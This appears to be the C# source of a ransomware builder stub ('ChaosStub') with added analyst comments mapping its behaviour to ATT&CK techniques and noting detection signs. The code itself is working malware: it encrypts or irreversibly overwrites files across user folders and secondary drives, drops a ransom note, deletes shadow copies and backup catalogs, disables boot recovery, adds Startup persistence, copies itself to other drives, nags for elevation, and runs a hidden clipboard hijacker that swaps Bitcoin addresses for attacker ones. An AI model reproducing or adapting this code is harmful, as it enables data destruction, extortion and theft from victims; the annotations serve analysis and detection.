ChaosStub
Anonymous
Created
November 2022
// Analyst annotations: comments only. The code tokens are unchanged; the layout was restored from a
// paste that had been collapsed onto a few long lines.
// This listing is a builder template. The '#'-prefixed tokens on the right-hand side of several field
// initialisers (and inside rsaKey) are placeholders and are not valid C# until they are substituted.
// Behaviours visible in this file, with the MITRE ATT&CK techniques they correspond to:
//   - file encryption / overwrite plus a dropped note          (T1486)
//   - shadow-copy, recovery-mode and backup-catalog tampering  (T1490)
//   - Startup-folder .url file and an HKCU Run-key helper      (T1547.001)
//   - self-copy to the root of every drive other than C:\      (T1091)
//   - desktop wallpaper replacement                            (T1491.001)
//   - clipboard monitoring that rewrites Bitcoin-address-shaped text
using System;
using System.Linq;
using System.Windows.Forms;
using System.Runtime.InteropServices;
using System.Text.RegularExpressions;

namespace ConsoleApplication7
{
    class Program
    {
        // Used by lookForDirectories to build per-user paths; the profile root is hard-coded to C:\Users\.
        private static string userName = Environment.UserName;
        private static string userDir = "C:\\Users\\";

        // NOTE(review): despite the "mutex" names, no Mutex is created anywhere in this listing. The
        // appMutex* fragments are only concatenated into appMutex / appMutex2 below, which
        // NotificationForm.WndProc uses as clipboard replacement text. The values are stored split,
        // presumably so the joined strings do not appear in the binary; static signatures should key
        // on the fragments.
        public static string appMutexRun = "7z459ajrk722yn8c5j4fg";

        // Builder options. Each value is a placeholder token filled in at build time.
        public static bool encryptionAesRsa = #encryptOption;
        public static string encryptedFileExtension = "#encryptedFileExtension";
        private static bool checkSpread = #checkSpread;
        private static string spreadName = "#spreadName";
        private static bool checkCopyRoaming = #copyRoaming;
        private static string processName = "#exeName";
        public static string appMutexRun2 = "2X28tfRmWaPyPQgvoHV";
        private static bool checkStartupFolder = #startupFolder;
        private static bool checkSleep = #checkSleep;
        private static int sleepTextbox = #sleepTextbox;
        private static string base64Image = @"#base64Image";
        public static string appMutexStartup = "1qw0ll8p9m8uezhqhyd";
        // File name of the dropped note; also the one file name encryptDirectory skips.
        private static string droppedMessageTextbox = "#droppedMessageTextbox";
        //************ Admin field **********
        // These options are only acted on in Main when checkAdminPrivilage is true.
        private static bool checkAdminPrivilage = #adminPrivilage;
        private static bool checkdeleteShadowCopies = #checkdeleteShadowCopies;
        private static bool checkdisableRecoveryMode = #checkdisableRecoveryMode;
        private static bool checkdeleteBackupCatalog = #checkdeleteBackupCatalog;
        //*****************
        public static string appMutexStartup2 = "17CqMQFeuB3NTzJ";
        // Joined at type initialisation from the fragments above.
        public static string appMutex2 = appMutexStartup2 + appMutexRun2;
        public static string staticSplit = "bc";
        public static string appMutex = staticSplit+appMutexStartup + appMutexRun;
        // Two alternatives: a '1' or '3' followed by 26-33 Base58 characters, or "bc1" followed by
        // 39-59 lower-case alphanumerics. These are the shapes of legacy and bech32 Bitcoin addresses.
        public readonly static Regex appMutexRegex = new Regex(@"(?:[13]{1}[a-km-zA-HJ-NP-Z1-9]{26,33}|bc1[a-z0-9]{39,59})");
        // Lines of the dropped note and the targeted extension list (compared against the
        // lower-cased result of Path.GetExtension in encryptDirectory).
        private static string[] messages = { #messages };
        private static string[] validExtensions = new[] { #extensions };

        /// <summary>
        /// user32.dll imports and constants used by driveNotification.NotificationForm.
        /// </summary>
        public static class NativeMethods
        {
            [DllImport("user32.dll", SetLastError = true)]
            [return: MarshalAs(UnmanagedType.Bool)]
            public static extern bool AddClipboardFormatListener(IntPtr hwnd);

            [DllImport("user32.dll", SetLastError = true)]
            public static extern IntPtr SetParent(IntPtr hWndChild, IntPtr hWndNewParent);

            // 0x031D is WM_CLIPBOARDUPDATE; (HWND)-3 is HWND_MESSAGE (parent of message-only windows).
            public const int clp = 0x031D;
            public static IntPtr intpreclp = new IntPtr(-3);
        }

        // Called only from SetWallpaper in this listing.
        [DllImport("user32.dll", CharSet = CharSet.Auto)]
        private static extern Int32 SystemParametersInfo(UInt32 action, UInt32 uParam, String vParam, UInt32 winIni);

        /// <summary>
        /// Entry point. In order: exits if another instance is running; optionally sleeps; relocates
        /// itself to the roaming AppData folder (elevated or not); optionally adds Startup-folder
        /// persistence; processes files; when the admin option is set, runs the enabled
        /// recovery-tampering commands; optionally copies itself to other drives; drops and opens
        /// the note; sets the wallpaper; then starts the clipboard listener on a new thread.
        /// </summary>
        static void Main(string[] args)
        {
            if (AlreadyRunning())
            {
                System.Environment.Exit(1);
            }

            if (checkSleep)
            {
                sleepOutOfTempFolder();
                //System.Threading.Thread.Sleep(sleepTextbox * 1000);
            }

            // Both helpers call Environment.Exit(1) once the relocated copy has been started, so the
            // rest of Main normally runs in the copy located in the roaming AppData folder.
            if (checkAdminPrivilage)
            {
                copyResistForAdmin(processName);
            }
            else
            {
                if (checkCopyRoaming)
                {
                    copyRoaming(processName);
                }
            }

            if (checkStartupFolder)
            {
                addLinkToStartup();
            }

            lookForDirectories();

            // The recovery-tampering commands run after file processing and only with the admin option.
            if (checkAdminPrivilage)
            {
                if (checkdeleteShadowCopies)
                {
                    deleteShadowCopies();
                }

                if (checkdisableRecoveryMode)
                {
                    disableRecoveryMode();
                }

                if (checkdeleteBackupCatalog)
                {
                    deleteBackupCatalog();
                }
            }

            if (checkSpread == true)
            {
                spreadIt(spreadName);
            }

            addAndOpenNote();
            SetWallpaper(base64Image);
            // The message loop runs on a non-background thread, so the process stays alive after
            // Main returns.
            new System.Threading.Thread(() => { Run(); }).Start();
        }

        /// <summary>
        /// Runs the WinForms message loop for the hidden clipboard-listener form.
        /// </summary>
        public static void Run()
        {
            Application.Run(new driveNotification.NotificationForm());
        }

        /// <summary>
        /// Sleeps for sleepTextbox seconds unless the entry assembly is located directly in the
        /// roaming AppData folder.
        /// </summary>
        private static void sleepOutOfTempFolder()
        {
            string currentPath = System.IO.Path.GetDirectoryName(System.Reflection.Assembly.GetEntryAssembly().Location);
            // The local is named tempFolder but holds SpecialFolder.ApplicationData, not %TEMP%.
            string tempFolder = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData);
            if (currentPath != tempFolder)
            {
                System.Threading.Thread.Sleep(sleepTextbox * 1000);
            }
        }

        /// <summary>
        /// Returns true when some other process has a main module path equal to this assembly's
        /// location. Processes whose module list cannot be read are skipped silently.
        /// </summary>
        private static bool AlreadyRunning()
        {
            System.Diagnostics.Process[] processes = System.Diagnostics.Process.GetProcesses();
            System.Diagnostics.Process currentProc = System.Diagnostics.Process.GetCurrentProcess();
            foreach (System.Diagnostics.Process process in processes)
            {
                try
                {
                    if (process.Modules[0].FileName == System.Reflection.Assembly.GetExecutingAssembly().Location && currentProc.Id != process.Id)
                        return true;
                }
                catch (Exception)
                {
                }
            }

            return false;
        }

        /// <summary>
        /// Returns length + 1 bytes filled by a newly constructed System.Random.
        /// </summary>
        public static byte[] random_bytes(int length)
        {
            Random rnd = new Random();
            length = length + 1;
            byte[] random = new byte[length];
            rnd.NextBytes(random);
            return random;
        }

        // Shared generator for RandomString and RandomStringForExtension.
        private static Random random = new Random();

        /// <summary>
        /// Returns a string of the given length drawn from lower-case letters and digits.
        /// </summary>
        public static string RandomString(int length)
        {
            const string pool = "abcdefghijklmnopqrstuvwxyz0123456789";
            var builder = new System.Text.StringBuilder();
            for (var i = 0; i < length; i++)
            {
                var c = pool[random.Next(0, pool.Length)];
                builder.Append(c);
            }

            return builder.ToString();
        }

        /// <summary>
        /// Returns the configured extension, or a random lower-case alphanumeric string of the given
        /// length when no extension was configured. With an empty setting every renamed file
        /// therefore gets a different suffix.
        /// </summary>
        public static string RandomStringForExtension(int length)
        {
            if (encryptedFileExtension == "")
            {
                const string pool = "abcdefghijklmnopqrstuvwxyz0123456789";
                var builder = new System.Text.StringBuilder();
                for (var i = 0; i < length; i++)
                {
                    var c = pool[random.Next(0, pool.Length)];
                    builder.Append(c);
                }

                return builder.ToString();
            }
            else
            {
                return encryptedFileExtension;
            }
        }

        /// <summary>
        /// Base64-encodes the UTF-8 bytes of the given text.
        /// </summary>
        public static string Base64EncodeString(string plainText)
        {
            var plainTextBytes = System.Text.Encoding.UTF8.GetBytes(plainText);
            return System.Convert.ToBase64String(plainTextBytes);
        }

        /// <summary>
        /// Builds the content written over files that encryptDirectory overwrites instead of
        /// encrypting: a header wrapping Base64 of a random 41-character string, then Base64 of the
        /// supplied text.
        /// </summary>
        public static string randomEncode(string plainText)
        {
            var plainTextBytes = System.Text.Encoding.UTF8.GetBytes(plainText);
            // Triage marker: the tag here is spelled "<EncyptedKey>" (no 'r'), whereas EncryptFile writes
            // "<EncryptedKey>". The value between the tags in this method is random text, not a wrapped key.
            return "<EncyptedKey>" + Base64EncodeString(RandomString(41)) + "<EncyptedKey> " + RandomString(2) + System.Convert.ToBase64String(plainTextBytes);
        }

        /// <summary>
        /// Recursively processes one directory. A file is targeted when its lower-cased extension is
        /// in validExtensions and its name is not the note name. The note is written once per
        /// directory, when the first targeted file is encountered. All exceptions are swallowed.
        /// </summary>
        /// <remarks>
        /// Recovery-relevant behaviour visible here: only files smaller than 2117152 bytes go through
        /// EncryptFile (and only when encryptionAesRsa is true). Every other targeted file is
        /// overwritten with content built from random bytes, so its original data is not present in
        /// the result in any form and can only come back from a backup.
        /// </remarks>
        private static void encryptDirectory(string location)
        {
            try
            {
                string[] files = System.IO.Directory.GetFiles(location);
                bool checkCrypted = true;
                for (int i = 0; i < files.Length; i++)
                {
                    try
                    {
                        string extension = System.IO.Path.GetExtension(files[i]);
                        string fileName = System.IO.Path.GetFileName(files[i]);
                        if (Array.Exists(validExtensions, E => E == extension.ToLower()) && fileName != droppedMessageTextbox)
                        {
                            System.IO.FileInfo fi = new System.IO.FileInfo(files[i]);
                            // Replaces all attributes with Normal, which clears read-only and hidden.
                            fi.Attributes = System.IO.FileAttributes.Normal;
                            if (fi.Length < 2117152)
                            {
                                // When the option is false, small files are left untouched.
                                if (encryptionAesRsa == true)
                                {
                                    EncryptFile(files[i]);
                                }
                            }
                            else if(fi.Length > 200000000)
                            {
                                // Overwrite path: content is derived from 200-300 million random bytes.
                                Random rnd = new Random();
                                int rndSize = rnd.Next(200000000,300000000);
                                string a = System.Text.Encoding.UTF8.GetString(random_bytes(rndSize));
                                System.IO.File.WriteAllText(files[i], randomEncode(a));
                                System.IO.File.Move(files[i], files[i] + "." + RandomStringForExtension(4));
                            }
                            else
                            {
                                // Overwrite path: content is derived from about a quarter of the
                                // original length in random bytes.
                                string a = System.Text.Encoding.UTF8.GetString(random_bytes(Convert.ToInt32(fi.Length) / 4));
                                System.IO.File.WriteAllText(files[i], randomEncode(a));
                                //File.WriteAllBytes(files[i], random_bytes(Convert.ToInt32(1098576)));
                                System.IO.File.Move(files[i], files[i] + "." + RandomStringForExtension(4));
                            }

                            if (checkCrypted)
                            {
                                checkCrypted = false;
                                System.IO.File.WriteAllLines(location + "/" + droppedMessageTextbox, messages);
                            }
                        }
                    }
                    catch
                    {
                    }
                }

                string[] childDirectories = System.IO.Directory.GetDirectories(location);
                for (int i = 0; i < childDirectories.Length; i++)
                {
                    encryptDirectory(childDirectories[i]);
                }
            }
            catch (Exception)
            {
            }
        }

        /// <summary>
        /// Returns the public key string passed to RSAEncrypt. The statements that fill the builder
        /// are a placeholder in this template.
        /// </summary>
        public static string rsaKey()
        {
            System.Text.StringBuilder pubclicKey = new System.Text.StringBuilder();
            #publicKey
            return pubclicKey.ToString();
        }

        /// <summary>
        /// Returns a password of the given length drawn from a fixed character set with a newly
        /// constructed System.Random.
        /// </summary>
        public static string CreatePassword(int length)
        {
            const string valid = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890*!=&?&/";
            System.Text.StringBuilder res = new System.Text.StringBuilder();
            Random rnd = new Random();
            while (0 < length--)
            {
                res.Append(valid[rnd.Next(valid.Length)]);
            }

            return res.ToString();
        }

        /// <summary>
        /// Encrypts a buffer with Rijndael (256-bit key, 128-bit block, CBC). Key and IV both come
        /// from Rfc2898DeriveBytes over the password with a fixed 8-byte salt and 1000 iterations.
        /// </summary>
        public static byte[] AES_Encrypt(byte[] bytesToBeEncrypted, byte[] passwordBytes)
        {
            byte[] encryptedBytes = null;
            byte[] saltBytes = new byte[] { 1, 2, 3, 4, 5, 6, 7, 8 };
            using (System.IO.MemoryStream ms = new System.IO.MemoryStream())
            {
                using (System.Security.Cryptography.RijndaelManaged AES = new System.Security.Cryptography.RijndaelManaged())
                {
                    AES.KeySize = 256;
                    AES.BlockSize = 128;
                    var key = new System.Security.Cryptography.Rfc2898DeriveBytes(passwordBytes, saltBytes, 1000);
                    AES.Key = key.GetBytes(AES.KeySize / 8);
                    AES.IV = key.GetBytes(AES.BlockSize / 8);
                    AES.Mode = System.Security.Cryptography.CipherMode.CBC;
                    using (var cs = new System.Security.Cryptography.CryptoStream(ms, AES.CreateEncryptor(), System.Security.Cryptography.CryptoStreamMode.Write))
                    {
                        cs.Write(bytesToBeEncrypted, 0, bytesToBeEncrypted.Length);
                        cs.Close();
                    }

                    encryptedBytes = ms.ToArray();
                }
            }

            return encryptedBytes;
        }

        /// <summary>
        /// Reads the whole file, encrypts it under a fresh 20-character password, and rewrites the file
        /// as text: "&lt;EncryptedKey&gt;" + RSA-wrapped password + "&lt;EncryptedKey&gt;" + Base64 ciphertext.
        /// The file is then renamed by appending "." and the extension from RandomStringForExtension.
        /// </summary>
        public static void EncryptFile(string file)
        {
            byte[] bytesToBeEncrypted = System.IO.File.ReadAllBytes(file);
            string password = CreatePassword(20);
            byte[] passwordBytes = System.Text.Encoding.UTF8.GetBytes(password);
            //passwordBytes = System.Security.Cryptography.SHA256.Create().ComputeHash(passwordBytes);
            byte[] bytesEncrypted = AES_Encrypt(bytesToBeEncrypted, passwordBytes);
            System.IO.File.WriteAllText(file, "<EncryptedKey>" + RSAEncrypt(password, rsaKey()) + "<EncryptedKey>" + Convert.ToBase64String(bytesEncrypted));
            System.IO.File.Move(file, file + "." + RandomStringForExtension(4));
        }

        /// <summary>
        /// Encrypts the UTF-8 bytes of the text with the RSA public key given as an XML string and
        /// returns the result as Base64. The second argument to Encrypt (true) selects OAEP padding.
        /// </summary>
        public static string RSAEncrypt(string textToEncrypt, string publicKeyString)
        {
            var bytesToEncrypt = System.Text.Encoding.UTF8.GetBytes(textToEncrypt);
            using (var rsa = new System.Security.Cryptography.RSACryptoServiceProvider(1024))
            {
                try
                {
                    // The key material in use is whatever the XML string supplies.
                    rsa.FromXmlString(publicKeyString.ToString());
                    var encryptedData = rsa.Encrypt(bytesToEncrypt, true);
                    var base64Encrypted = Convert.ToBase64String(encryptedData);
                    return base64Encrypted;
                }
                finally
                {
                    rsa.PersistKeyInCsp = false;
                }
            }
        }

        /// <summary>
        /// Selects the roots handed to encryptDirectory: every drive other than C:\ in full, then a
        /// fixed list of folders under C:\Users\&lt;user&gt;, then the roaming AppData folder and the
        /// common (all-users) documents, pictures, music, videos and desktop folders.
        /// </summary>
        private static void lookForDirectories()
        {
            // DriveInfo.GetDrives also returns removable and mapped network drives.
            foreach (var item in System.IO.DriveInfo.GetDrives())
            {
                if (item.ToString() != "C:\\")
                {
                    encryptDirectory(item.ToString());
                }
            }

            // startPath_1 and startPath_4 are both the Desktop folder.
            string startPath_1 = userDir + userName + "\\Desktop";
            string startPath_2 = userDir + userName + "\\Links";
            string startPath_3 = userDir + userName + "\\Contacts";
            string startPath_4 = userDir + userName + "\\Desktop";
            string startPath_5 = userDir + userName + "\\Documents";
            string startPath_6 = userDir + userName + "\\Downloads";
            string startPath_7 = userDir + userName + "\\Pictures";
            string startPath_8 = userDir + userName + "\\Music";
            string startPath_9 = userDir + userName + "\\OneDrive";
            string startPath_10 = userDir + userName + "\\Saved Games";
            string startPath_11 = userDir + userName + "\\Favorites";
            string startPath_12 = userDir + userName + "\\Searches";
            string startPath_13 = userDir + userName + "\\Videos";
            encryptDirectory(startPath_1);
            encryptDirectory(startPath_2);
            encryptDirectory(startPath_3);
            encryptDirectory(startPath_4);
            encryptDirectory(startPath_5);
            encryptDirectory(startPath_6);
            encryptDirectory(startPath_7);
            encryptDirectory(startPath_8);
            encryptDirectory(startPath_9);
            encryptDirectory(startPath_10);
            encryptDirectory(startPath_11);
            encryptDirectory(startPath_12);
            encryptDirectory(startPath_13);
            encryptDirectory(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData));
            encryptDirectory(Environment.GetFolderPath(Environment.SpecialFolder.CommonDocuments));
            encryptDirectory(Environment.GetFolderPath(Environment.SpecialFolder.CommonPictures));
            encryptDirectory(Environment.GetFolderPath(Environment.SpecialFolder.CommonMusic));
            encryptDirectory(Environment.GetFolderPath(Environment.SpecialFolder.CommonVideos));
            encryptDirectory(Environment.GetFolderPath(Environment.SpecialFolder.CommonDesktopDirectory));
        }

        /// <summary>
        /// Unless already running under the configured name from the roaming AppData folder, copies
        /// the executable there under that name, starts the copy, and exits this process with code 1.
        /// An existing copy is deleted and replaced first.
        /// </summary>
        /// <remarks>
        /// Detection: an executable written directly into the roaming AppData folder and started
        /// from there by a process that exits immediately afterwards.
        /// </remarks>
        private static void copyRoaming(string processName)
        {
            string payloadFutureName = processName;
            string exeName = System.AppDomain.CurrentDomain.FriendlyName;
            string exepath = System.Reflection.Assembly.GetExecutingAssembly().Location;
            // startuppath is computed but not used in this method.
            string startuppath = Environment.GetFolderPath(Environment.SpecialFolder.Startup) + @"\" + exeName;
            string tempFolder = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + @"\";
            string executeAs = tempFolder + payloadFutureName;
            //Console.WriteLine(exepath);
            //Console.WriteLine(startuppath);
            if (exeName != payloadFutureName || exepath != executeAs)
            {
                if (!System.IO.File.Exists(executeAs))
                {
                    // The copy source is the bare friendly name, resolved against the current directory.
                    System.IO.File.Copy(exeName, executeAs);
                    System.Diagnostics.ProcessStartInfo processStartInfo = new System.Diagnostics.ProcessStartInfo(executeAs);
                    processStartInfo.WorkingDirectory = tempFolder;
                    System.Diagnostics.Process process = new System.Diagnostics.Process();
                    process.StartInfo = processStartInfo;
                    if (process.Start())
                    {
                        System.Environment.Exit(1);
                    }
                }
                else
                {
                    try
                    {
                        System.IO.File.Delete(executeAs);
                        System.Threading.Thread.Sleep(200);
                        System.IO.File.Copy(exeName, executeAs);
                    }
                    catch
                    {
                    }

                    System.Diagnostics.ProcessStartInfo processStartInfo = new System.Diagnostics.ProcessStartInfo(executeAs);
                    processStartInfo.WorkingDirectory = tempFolder;
                    System.Diagnostics.Process process = new System.Diagnostics.Process();
                    process.StartInfo = processStartInfo;
                    if (process.Start())
                    {
                        System.Environment.Exit(1);
                    }
                }
            }
        }

        /// <summary>
        /// Same relocation as copyRoaming, but the copy is started through the shell with the "runas"
        /// verb, which raises an elevation prompt. If the start fails with ERROR_CANCELLED (1223),
        /// the method calls itself again, so a declined prompt is followed by another one.
        /// </summary>
        /// <remarks>
        /// Detection: repeated consent prompts for an executable in the roaming AppData folder.
        /// </remarks>
        private static void copyResistForAdmin(string processName)
        {
            string payloadFutureName = processName;
            string exeName = System.AppDomain.CurrentDomain.FriendlyName;
            string exepath = System.Reflection.Assembly.GetExecutingAssembly().Location;
            // startuppath is computed but not used in this method.
            string startuppath = Environment.GetFolderPath(Environment.SpecialFolder.Startup) + @"\" + exeName;
            string tempFolder = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + @"\";
            string executeAs = tempFolder + payloadFutureName;
            const int ERROR_CANCELLED = 1223;
            var startInfo = new System.Diagnostics.ProcessStartInfo(executeAs)
            {
                UseShellExecute = true,
                Verb = "runas",
                WindowStyle = System.Diagnostics.ProcessWindowStyle.Normal,
                WorkingDirectory = tempFolder
            };
            // This Process instance is configured but the launches below go through the static
            // Process.Start(startInfo).
            System.Diagnostics.Process process = new System.Diagnostics.Process();
            process.StartInfo = startInfo;
            if (exeName != payloadFutureName || exepath != executeAs)
            {
                if (!System.IO.File.Exists(executeAs))
                {
                    System.IO.File.Copy(exeName, executeAs);
                    try
                    {
                        System.Diagnostics.Process.Start(startInfo);
                        System.Environment.Exit(1);
                    }
                    catch (System.ComponentModel.Win32Exception ex)
                    {
                        if (ex.NativeErrorCode == ERROR_CANCELLED)
                        {
                            copyResistForAdmin(processName);
                        }
                    }
                }
                else
                {
                    try
                    {
                        System.IO.File.Delete(executeAs);
                        System.Threading.Thread.Sleep(200);
                        System.IO.File.Copy(exeName, executeAs);
                    }
                    catch
                    {
                    }

                    try
                    {
                        System.Diagnostics.Process.Start(startInfo);
                        System.Environment.Exit(1);
                    }
                    catch (System.ComponentModel.Win32Exception ex)
                    {
                        if (ex.NativeErrorCode == ERROR_CANCELLED)
                        {
                            copyResistForAdmin(processName);
                        }
                    }
                }
            }
        }

        /// <summary>
        /// Writes "&lt;process name&gt;.url" into the user's Startup folder as an [InternetShortcut] whose
        /// URL is a file:/// reference to this executable.
        /// </summary>
        /// <remarks>
        /// Detection: .url files in a Startup folder whose URL= line is a file:/// path to an executable.
        /// </remarks>
        private static void addLinkToStartup()
        {
            string startUpFolder = Environment.GetFolderPath(Environment.SpecialFolder.Startup);
            string linkName = System.Diagnostics.Process.GetCurrentProcess().ProcessName;
            using (System.IO.StreamWriter writer = new System.IO.StreamWriter(startUpFolder + "\\" + linkName + ".url"))
            {
                string app = System.Reflection.Assembly.GetExecutingAssembly().Location;
                writer.WriteLine("[InternetShortcut]");
                writer.WriteLine("URL=file:///" + app);
                writer.WriteLine("IconIndex=0");
                string icon = app.Replace('\\', '/');
                writer.WriteLine("IconFile=" + icon);
            }
        }

        /// <summary>
        /// Writes the note into the roaming AppData folder and opens it with Process.Start on the
        /// file path. Failures are ignored.
        /// </summary>
        private static void addAndOpenNote()
        {
            // The local is named tempFolder but holds the full path of the note file.
            string tempFolder = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + @"\" + droppedMessageTextbox;
            //string startUpDirectory = userDir + userName + "\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\read_it.txt";
            try
            {
                System.IO.File.WriteAllLines(tempFolder, messages);
                System.Threading.Thread.Sleep(500);
                System.Diagnostics.Process.Start(tempFolder);
            }
            catch
            {
            }
        }

        /// <summary>
        /// Sets the HKCU Run value "Microsoft Store" to this executable's path. Nothing in this
        /// listing calls the method.
        /// </summary>
        /// <remarks>
        /// Detection: a Run value named "Microsoft Store" whose data is an executable path.
        /// </remarks>
        private static void registryStartup()
        {
            try
            {
                Microsoft.Win32.RegistryKey key1 = Microsoft.Win32.Registry.CurrentUser.OpenSubKey ("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true);
                //REGISTRY KEY FOR CURRENT EXE LOCATION
                key1.SetValue("Microsoft Store", System.Reflection.Assembly.GetExecutingAssembly().Location);
            }
            catch
            {
            }
        }

        /// <summary>
        /// Copies this executable to the root of every drive other than C:\ under the configured
        /// name, skipping drives where a file of that name already exists. Copy failures are ignored.
        /// </summary>
        private static void spreadIt(string spreadName)
        {
            foreach (var item in System.IO.DriveInfo.GetDrives())
            {
                if (item.ToString() != "C:\\")
                {
                    if (!System.IO.File.Exists(item.ToString() + spreadName))
                    {
                        // System.Threading.Thread.Sleep(500);
                        try
                        {
                            System.IO.File.Copy(System.Reflection.Assembly.GetExecutingAssembly().Location, item.ToString() + spreadName);
                        }
                        catch
                        {
                        }
                    }
                }
            }
        }

        /// <summary>
        /// Runs the given command line as "cmd.exe /C ..." with a hidden window and waits for it to exit.
        /// </summary>
        /// <remarks>
        /// Detection: cmd.exe spawned by a process in the roaming AppData folder, with vssadmin,
        /// wmic, bcdedit or wbadmin as child processes.
        /// </remarks>
        private static void runCommand(string commands)
        {
            System.Diagnostics.Process process = new System.Diagnostics.Process();
            System.Diagnostics.ProcessStartInfo startInfo = new System.Diagnostics.ProcessStartInfo();
            //startInfo.WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden;
            startInfo.FileName = "cmd.exe";
            startInfo.Arguments = "/C " + commands;
            //startInfo.Arguments = "/C ";
            //startInfo.Arguments = "/C ping google.com";
            startInfo.WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden;
            process.StartInfo = startInfo;
            process.Start();
            process.WaitForExit();
        }

        /// <summary>
        /// Deletes volume shadow copies through both vssadmin and wmic. The exact command line below
        /// is a high-signal detection string.
        /// </summary>
        private static void deleteShadowCopies()
        {
            //System.Windows.Forms.MessageBox.Show("deleteShadowCopies");
            runCommand("vssadmin delete shadows /all /quiet & wmic shadowcopy delete");
        }

        /// <summary>
        /// Sets the default boot entry to ignore boot failures and turns off its recovery option.
        /// </summary>
        private static void disableRecoveryMode()
        {
            //System.Windows.Forms.MessageBox.Show("disableRecoveryMode");
            runCommand("bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no");
        }

        /// <summary>
        /// Deletes the Windows Backup catalog.
        /// </summary>
        private static void deleteBackupCatalog()
        {
            //System.Windows.Forms.MessageBox.Show("deleteBackupCatalog");
            runCommand("wbadmin delete catalog -quiet");
        }

        /// <summary>
        /// When the image string is non-empty, decodes it to a randomly named .jpg in the temp folder
        /// and sets it as the desktop wallpaper. Failures are ignored.
        /// </summary>
        public static void SetWallpaper(string base64)
        {
            if (base64 != "")
            {
                try
                {
                    // The local is named tempFolder but holds the full path of the image file.
                    string tempFolder = System.IO.Path.GetTempPath() + RandomString(9) + ".jpg";
                    System.IO.File.WriteAllBytes(tempFolder, Convert.FromBase64String(base64));
                    // 0x14 is SPI_SETDESKWALLPAPER; 0x01 | 0x02 is SPIF_UPDATEINIFILE | SPIF_SENDCHANGE.
                    SystemParametersInfo(0x14, 0, tempFolder, 0x01 | 0x02);
                }
                catch{}
            }
        }
    }

    /// <summary>
    /// Container for the clipboard-listener form. The type name does not describe what the code does;
    /// nothing here deals with drives.
    /// </summary>
    public sealed class driveNotification
    {
        /// <summary>
        /// Message-only window that receives clipboard-change notifications and replaces
        /// Bitcoin-address-shaped text on the clipboard with one of two fixed strings.
        /// </summary>
        /// <remarks>
        /// Detection: a process without a visible window that registers a clipboard format listener
        /// and writes to the clipboard immediately after each clipboard change.
        /// </remarks>
        public class NotificationForm : Form
        {
            private static string currentClipboard = GetText();

            public NotificationForm()
            {
                // Reparenting to HWND_MESSAGE makes this a message-only window.
                Program.NativeMethods.SetParent(Handle, Program.NativeMethods.intpreclp);
                Program.NativeMethods.AddClipboardFormatListener(Handle);
            }

            /// <summary>
            /// Returns true when the pattern matches anywhere in the last clipboard text read.
            /// </summary>
            private bool RegexResult(Regex pattern)
            {
                if (pattern.Match(currentClipboard).Success)
                    return true;
                else
                    return false;
            }

            /// <summary>
            /// On WM_CLIPBOARDUPDATE, re-reads the clipboard. Text starting with "bc1" has every regex
            /// match replaced with Program.appMutex; any other text has every match replaced with
            /// Program.appMutex2. The Contains checks skip text that already holds the replacement,
            /// which also stops the form reacting to its own SetText.
            /// </summary>
            protected override void WndProc(ref Message m)
            {
                if (m.Msg == Program.NativeMethods.clp)
                {
                    currentClipboard = GetText();
                    if (currentClipboard.StartsWith("bc1"))
                    {
                        if (RegexResult(Program.appMutexRegex) && !currentClipboard.Contains(Program.appMutex))
                        {
                            string result = Program.appMutexRegex.Replace(currentClipboard, Program.appMutex);
                            SetText(result);
                        }
                    }
                    else
                    {
                        if (RegexResult(Program.appMutexRegex) && !currentClipboard.Contains(Program.appMutex2))
                        {
                            string result = Program.appMutexRegex.Replace(currentClipboard, Program.appMutex2);
                            SetText(result);
                        }
                    }
                }

                base.WndProc(ref m);
            }

            protected override CreateParams CreateParams
            {
                get
                {
                    var cp = base.CreateParams;
                    // 0x80 is WS_EX_TOOLWINDOW, which keeps the window off the taskbar and out of Alt+Tab.
                    cp.ExStyle |= 0x80;
                    return cp;
                }
            }

            /// <summary>
            /// Reads the clipboard text on a dedicated STA thread and returns it.
            /// </summary>
            public static string GetText()
            {
                string ReturnValue = string.Empty;
                System.Threading.Thread STAThread = new System.Threading.Thread(
                    delegate()
                    {
                        ReturnValue = System.Windows.Forms.Clipboard.GetText();
                    });
                STAThread.SetApartmentState(System.Threading.ApartmentState.STA);
                STAThread.Start();
                STAThread.Join();
                return ReturnValue;
            }

            /// <summary>
            /// Writes the given text to the clipboard on a dedicated STA thread.
            /// </summary>
            public static void SetText(string txt)
            {
                System.Threading.Thread STAThread = new System.Threading.Thread(
                    delegate()
                    {
                        System.Windows.Forms.Clipboard.SetText(txt);
                    });
                STAThread.SetApartmentState(System.Threading.ApartmentState.STA);
                STAThread.Start();
                STAThread.Join();
            }
        }
    }
}